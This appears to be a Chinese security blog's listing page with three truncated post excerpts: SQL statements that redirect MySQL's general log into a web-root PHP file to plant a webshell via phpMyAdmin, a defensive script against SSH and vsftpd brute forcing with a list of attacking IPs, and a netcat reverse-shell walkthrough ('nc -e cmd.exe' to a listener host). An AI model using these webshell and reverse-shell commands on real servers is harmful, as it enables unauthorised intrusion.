三个sql语句拿下phpmyadmin的shell

   
分类:安全 | 2018-06-17 | 撸过 2,692 次
0人扯蛋

三个sql语句拿下phpmyadmin的shell

首先要知道路径

一句一句的执行

---------------------------------------------------------
set global general_log='on';
---------------------------------------------------------
SET global general_log_file='D:/webshell/www/cmd.php';
---------------------------------------------[......]

继续阅读

用SHELL脚本来防止SSH和vsftpd暴力破解

   
分类:技术 | 2011-09-15 | 撸过 720 次
0人扯蛋

我的一台公网服务器,由于网站采取的是双备份策略,所以开放了vsftpd的21端口,近来发现许多人在尝试暴力破解vsftpd和ssh,我随便看了看/var/log/secure日志,显示如下:
118.33.110.52=2834
119.145.254.77=37
121.254.179.199=226
121.88.250.243=35
200.29.110.104=168
202.78.173.199=250
222.221.2.210=373
这里面除了119.145.254.77和121.88.250.243是正常的外,其它的基本都是恶意IP。
由于我的服务器是置于LVS集群后面,所以[......]

继续阅读

使用NC反弹Shell

   
分类:安全 | 2011-08-22 | 撸过 3,520 次
0人扯蛋

今日中午有某牛牛问我如何使用NC反弹拿shell当时真是冷汗直冒!哎,郁闷,正好此时有空就写出来供某牛牛和小菜们学习一下!

使用NC反弹Shell

在进行Shell反弹时,有时会碰到服务器不支持PHP或者WebShell无法成功反弹Shell的情况,例如有的服务器只支持JSP,不支持PHP。此时,可以同样采用Windows下的经典的NC反弹Shell方法。

在Windows下反弹CmdShell时,首先要在本机运行"nc -vv -l -p 端口号"监听端口,然后在WebShell中执行"nc -e cmd.exe 监听主机IP地址 端口",就可以反弹一个CmdShell。这个方法在Li[......]

继续阅读